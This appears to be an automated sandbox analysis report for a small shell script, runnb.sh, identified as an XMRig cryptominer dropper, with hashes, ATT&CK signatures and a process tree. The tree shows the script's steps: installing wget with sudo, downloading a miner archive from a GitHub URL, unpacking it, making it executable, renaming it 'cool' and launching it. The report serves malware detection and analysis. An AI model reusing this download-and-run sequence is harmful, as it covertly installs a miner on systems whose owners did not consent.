Analysis
-
max time kernel
39s -
max time network
156s -
platform
debian-12_armhf -
resource
debian12-armhf-20240221-en -
resource tags
arch:armhfimage:debian12-armhf-20240221-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem -
submitted
30-10-2024 08:11
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral4
Sample
runnb.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/files/fstream-38.dat family_xmrig behavioral1/files/fstream-38.dat xmrig -
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid Process 804 chmod -
Executes dropped EXE 1 IoCs
Processes:
coolioc pid Process /tmp/xmrig-6.22.0/cool 806 cool -
OS Credential Dumping 1 TTPs 2 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
Processes:
sudodpkg-preconfiguredescription ioc Process File opened for reading /etc/shadow sudo File opened for reading /etc/shadow dpkg-preconfigure -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Processes:
aptdescription ioc Process File deleted /var/log/apt/eipp.log.xz apt -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Write file to user bin folder 1 IoCs
Processes:
dpkgdescription ioc Process File opened for modification /usr/bin/wget.dpkg-new dpkg -
Checks CPU configuration 1 TTPs 6 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
httpaptwgetsendmailexim4httpdescription ioc Process File opened for reading /proc/cpuinfo http File opened for reading /proc/cpuinfo apt File opened for reading /proc/cpuinfo wget File opened for reading /proc/cpuinfo sendmail File opened for reading /proc/cpuinfo exim4 File opened for reading /proc/cpuinfo http -
Reads CPU attributes 1 TTPs 1 IoCs
Processes:
exim4description ioc Process File opened for reading /sys/devices/system/cpu/online exim4 -
Processes:
dpkgmvsudohttpdpkgtardpkg-debdpkgdpkgdpkgdpkgtaraptsendmaildpkgaptdpkgdpkgdpkgdpkg-debdpkgdescription ioc Process File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems mv File opened for reading /proc/self/stat sudo File opened for reading /proc/sys/crypto/fips_enabled http File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems tar File opened for reading /proc/meminfo dpkg-deb File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems tar File opened for reading /proc/filesystems sudo File opened for reading /proc/1/limits sudo File opened for reading /proc/self/fd apt File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/filesystems dpkg File opened for reading /proc/sys/kernel/seccomp/actions_avail sudo File opened for reading /proc/sys/kernel/ngroups_max apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/sys/crypto/fips_enabled apt File opened for reading /proc/sys/kernel/cap_last_cap sudo File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/meminfo dpkg-deb File opened for reading /proc/filesystems dpkg -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
tarwgetdescription ioc Process File opened for modification /tmp/xmrig-6.22.0/xmrig tar File opened for modification /tmp/xmrigtar.tar.gz wget File opened for modification /tmp/xmrig-6.22.0/SHA256SUMS tar File opened for modification /tmp/xmrig-6.22.0/config.json tar
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:698
-
/usr/bin/sudosudo apt install wget2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:710 -
/usr/sbin/sendmailsendmail -t3⤵
- Checks CPU configuration
- Reads runtime system information
PID:723 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t62rw-0000Bf-234⤵
- Checks CPU configuration
- Reads CPU attributes
PID:742
-
-
-
/usr/bin/aptapt install wget3⤵
- Deletes log files
- Checks CPU configuration
- Reads runtime system information
PID:726 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:735
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:754
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http4⤵
- Checks CPU configuration
PID:755
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http4⤵
- Checks CPU configuration
- Reads runtime system information
PID:756
-
-
/bin/sh/bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"4⤵PID:763
-
/usr/sbin/dpkg-preconfigure/usr/sbin/dpkg-preconfigure --apt5⤵
- OS Credential Dumping
PID:764 -
/usr/local/sbin/localelocale charmap6⤵PID:765
-
-
/usr/local/bin/localelocale charmap6⤵PID:765
-
-
/usr/sbin/localelocale charmap6⤵PID:765
-
-
/usr/bin/localelocale charmap6⤵PID:765
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:766
-
/usr/bin/sttystty -a7⤵PID:767
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:768
-
/usr/bin/sttystty -a7⤵PID:769
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:770
-
/usr/bin/sttystty -a7⤵PID:771
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:772
-
/usr/bin/sttystty -a7⤵PID:773
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:774
-
/usr/bin/sttystty -a7⤵PID:775
-
-
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:776
-
/usr/bin/sttystty -a7⤵PID:777
-
-
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --assert-multi-arch4⤵
- Reads runtime system information
PID:778
-
-
/usr/bin/dpkg/usr/bin/dpkg --assert-protected-field4⤵
- Reads runtime system information
PID:779
-
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 18 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb4⤵
- Write file to user bin folder
- Reads runtime system information
PID:780 -
/usr/sbin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb5⤵PID:781
-
-
/usr/bin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb5⤵
- Software Deployment Tools
PID:781
-
-
/usr/sbin/dpkg-debdpkg-deb --control /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb /var/lib/dpkg/tmp.ci5⤵PID:782
-
-
/usr/bin/dpkg-debdpkg-deb --control /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb /var/lib/dpkg/tmp.ci5⤵
- Reads runtime system information
PID:782 -
/usr/sbin/tartar -x -f - "--warning=no-timestamp"6⤵PID:785
-
-
/usr/bin/tartar -x -f - "--warning=no-timestamp"6⤵
- Reads runtime system information
PID:785
-
-
-
/usr/sbin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb5⤵PID:787
-
-
/usr/bin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb5⤵
- Reads runtime system information
PID:787
-
-
/usr/sbin/rmrm -rf -- /var/lib/dpkg/tmp.ci5⤵PID:791
-
-
/usr/bin/rmrm -rf -- /var/lib/dpkg/tmp.ci5⤵PID:791
-
-
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 18 --configure --pending4⤵
- Reads runtime system information
- Software Deployment Tools
PID:792
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:795
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:796
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:797
-
-
-
-
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
PID:798 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:799
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:800
-
-
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:801
-
-
/usr/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:802 -
/usr/local/sbin/gzipgzip -d3⤵PID:803
-
-
/usr/local/bin/gzipgzip -d3⤵PID:803
-
-
/usr/sbin/gzipgzip -d3⤵PID:803
-
-
/usr/bin/gzipgzip -d3⤵PID:803
-
-
-
/usr/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:804
-
-
/usr/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:805
-
-
/tmp/xmrig-6.22.0/cool./cool2⤵
- Executes dropped EXE
PID:806
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Indicator Removal
1Clear Linux or Mac System Logs
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD5b9b2c6ce9809036fdf253b99a6b79d94
SHA17bc9e1d1ba3721d077ef8b87b1b25acca96c9360
SHA2566462122f2f002055ae4bcc196aeed8dd8edb486405c716acf76b2c9a933c9430
SHA5124ca4ae85ae512d2cfe627f549db0212883ac69a15e5a05725050c5313538efc50f0598ffc616b40f3fb8ce96ca920c9d8f72f3d2b8ed76376d73297c8a9a6721
-
Filesize
150B
MD519f1bb08cf8997837b1f738b76ca97e9
SHA1c497499ad539d6ef580c6c932a2633fe820abded
SHA25699ca11102d0994a98a76722b325f3215b30d3b3df3d722a2baebf6f9944566fa
SHA512fbb742f0fa67720e798b493a5e5ba5e72cbdde3c0ea55cfc0704f93ab97c586434a3e029f6e1e3ed655da997649aa8e9caf352018b87457755f75ca1bfe50230
-
Filesize
919B
MD50a9b0011891eae4086d16c3364e772ff
SHA198fe8a7b5b6b0c0aa7635e4e388c67c863772b69
SHA2561aa77bd6697d36e345cd7c0769613e9798106b0fed206d7f766e846b63aa10fd
SHA5129e1791e92d71b539aac8f944a3db65708ebfca102f16e3e7af429aaea1446be781c4ec5cb740a163dbc11a3bdacfed36d21262e05fcf29d896beb06ce0d59554
-
Filesize
7.9MB
MD551f989c19819a0a0625c251df6affe95
SHA13b27c895b6f9665f9287510207bfcdcb7fe6e059
SHA256fd11982f252c060a1372e81d5be57589647052b56281a5c54975ca22164f7726
SHA512ec8ce7d1960f9ae564d5654a35e2ad108ed900f3f56b38dfe4601be0db49c1a3cd9c643307b72c2bfc0c157d2640a62343cd7377f68d29327104e0e78b4bdfbd
-
Filesize
3.4MB
MD5ccdb2d76041e107dff38f962d65b3d4b
SHA1e9360c43398f3725b0a3eb87e2448ac416d96be3
SHA25611d52ee20c865f6b0b7787bfe7a06d7ce0d865e041552365b9a026a0d24cc18f
SHA512f6b090c698cb1092bf10010bbe00fed0388e7117b8397cf3113a23271bb514d0d03b559de721896994b472f26f9e3aeeddc2877d71bcc7830313e97d2171033d
-
Filesize
934KB
MD573945e4637d88baf7f802ea0f1868bdf
SHA189676c5a029d84e16df5ce2d10fe859e97287202
SHA256368f8913649cecfe75041d882d4c4d400c01a344b41cda307e29927f4bbd5647
SHA51231d458a37d148e301aad1ec8b33c2c87816dc1e71b710a96d345b39361553b8f3f8e03dd4b8fadea402a35416dc4b655403d0ca3c3a0426b51d248f742d66c39
-
Filesize
554KB
MD587850db32ddcacde37a9cee260db785e
SHA19999972069b4bda9fc33371940caadc776115c24
SHA25605ce3bf2e51b3fbff8d63b9010781107d4212e23382cdc2e06d0498959950a17
SHA5121574ca991668f57381014a2264360f754478b2be566a21cce2bc59168f471092610467a951f71bb984f639dce48d0006e59b858d9f48703e46ce787e12a83a32
-
Filesize
554KB
MD5691667079b979c3a5eb801ca05671dbe
SHA1118fc0814af1fab61638db7580152e3eccaaf93e
SHA256279a471f00c81b603c45a6eb05dbf891e2555075241301c7b2106cb87fa03785
SHA5124b99f00882f7fa3e0fadd963f03883cb20b6a59c6e83f52f91992b6e4cf8f9bc40516efe0cec59bccb78e744784b482bb7ad730182dc0146c2c8853da112c464
-
Filesize
12B
MD5c0f1f8b1d9f35439a9718a495f7454f8
SHA1d984c94e22944b82e8583e9e9715273e39adf24c
SHA2560664e0947f5b7114c73738ae117752035541360c7056237a2f11a5f89b8d214a
SHA512a1c56a0491e3757606cfb8e1e42fd7ff86fb8ffaa4be40e2cc28ae40568d22d86c84f58332a0a521d725815312b33a166bf6f94ab33b66ae8ecdf4a3a6e23e07
-
Filesize
1KB
MD515a67dcc7d6c33a7d684d6d22803409b
SHA1a3af6cf95051a9b7686f271b8dd3084a35073b67
SHA2565624aa0370b6810df23cb268228a3d70f25bb93b13938e2fd8afe24783aba1fe
SHA512311ce72bc021bb02a220f6a48c1be25c9d916222f6881c2cef5acda45141cfd0389db7281ad6500afbafbe6ec38bdeab03a32d14d657f53413535457a4d8884d
-
Filesize
6KB
MD5b6c36b24b0521a0cb7355a2286f5248d
SHA1d712c957fcf1949968d7494016b260914629982d
SHA256519d8e81fd184d638ef3d023c4884d430000ee4ea1e6228b60f1939bf386f148
SHA51209e5fc9a65b0e2cc864e0025adbd56ed2d6a518d2fa20f799ebd6a4a4bbc539e22540f6ec5f858568515c8a54512ec336b122321efb81b6644396ca599aa8fc6
-
Filesize
4KB
MD5a1edb94bda0d88c9a68cf6e78117e038
SHA1a9c7ef27deaf7b1289905d58f5a6d56474e137a0
SHA256d5cb34201f475c3f5eeba0b55f150364c64858290f11d97fdcf6086b05ef8b6b
SHA512ebd86b9dd6c675e3f564609c4d59811201287615f9ae9f47be1e7e39c242591e142da9837d20154593588801da392ba92979b43f3992e262059d2fe9319f65c1
-
Filesize
4KB
MD54b26633c549d070f79242b10f022fddd
SHA1e3aa320bb64327f26c52a63fa1c475879057a059
SHA256cea6fb2ac6eed9fb207d0aafa2080d2c7d3fea1a710f5f41cc13a535dba9943f
SHA51250be55640a88ca3bdd2af82e91b2e2e1d5f3fbd01ab863c34d1dc8da3c7b9ba9f78c26eff9b62f94e9c36a71f95af74de3fd3bfa65136ad9c03f720a4d9086fe
-
Filesize
4KB
MD5824e08675159504de0728e114178963c
SHA140430be413300ee7425a913adca97422d58ee49c
SHA256829e100e7120370a6143571686af9fb4aceb0991647cda5d5cf7e99d3c67a6a5
SHA5127ba01090fab596383e21dcab4b4d11cb7eac5430b7e9449bf38ab4e57be5e3060834cc57b25aec769afc9558f2a2aff75bf96b7215e359d679b107b5f356cbd5
-
Filesize
4KB
MD5edae9b7299f2afc09258160786a4dada
SHA1dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA5120e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff
-
Filesize
22KB
MD5ad7583ed065f78bb17e1d5e8ccc9bf44
SHA125d96df908cc8149caab14139c093fcb59da85d8
SHA256a3c9c685b939b51c76ad990734e5efed2dddb3436c0e210cb5bb902b94085238
SHA512d3db3fccb804da36daaecb46a4bc93cf7d13b3ea210f226529734fdf3df5faea98ca418d0688e35b851f7d450e76ec01b3055fb87dc9345461360453cf8a8c6c
-
Filesize
853B
MD5a3b5db9d57f4b16f49a90838d8340ba7
SHA1493985be2f08f20e662873a460c189a804b9b1e5
SHA256654965b7f93dc750f8d6771f7a8ef43138d455bae9bd7f0e01ba8e955f162f42
SHA51203b0c557a87bbd7c029e4f345ddd318e661c1eab292f1d315971f17a6ac7136288fea9ac7acecaddb1e97bc8ca9973241bef9a3e0797a3123c169a40f06ce719
-
Filesize
155B
MD524ac53c53afeeec3dafae233e278f078
SHA12c82cbbebcf766ef1529148765bff8891dbff8e3
SHA256e25a06e23483dce0e0c6ac643cd880bc5755e9319f7d2aaf9a7f81da4c2e6ae1
SHA51240f433fec62b24b5703851197729bd1e8128eb4a8be0b0b317a35219e287a82aea7c80a646b106fbaa9ccf6843e7196a8f4e9f6c30165f72107df419c8dd6ebc
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
1004B
MD5640afdcb09f136b104e11055d62cabc8
SHA159b7bf034c77fa9656c524ca25f2250d9bf4228f
SHA2562b2ee7c94489b10dceafd13c2515e1fac0103cc80036ce98fa0e79c46438062b
SHA512815f62212adf795b537b0502aa27b7cfec9907a362637b25a7ed0852a25ae88ebeef33ba958a7416aed514acc990727c8acc1a4fb010e0cabe97ab7ba7085559
-
Filesize
89B
MD5623f6152cdf57f02aa82a0b35d8c36d5
SHA18ba40e42b1d5f7ab1296ea0c7925c5b88e396ece
SHA256ad2a7b5e723d5dea61f175f0b616c18526ee197e481d6dc2eb10dcb14b8ca26f
SHA5125b6455f7f598647e0132d4b67dc0cde26350330b6fd4dedec685a9b8186e85883656f700b8f19f64b94ceac4fa9e1e4b77b2caa3e292f274fb3295d20a44bb50
-
Filesize
288B
MD57793c1ff7382f3515911feefa688d2f9
SHA187fb918414701f9de24310f5fddac3866da01a07
SHA256170214c7bd2d37639ebe4d702ee19d921895f51e7d9c90d6dcc4e25b592d3b38
SHA5124240d32bc88f1192896d646ca87e3e7b050be3b62b29ed5a6610f6d9b5f481a41baaed361db1942278253f57517487df75f8b889d8c26a97170242c15f8ce2ad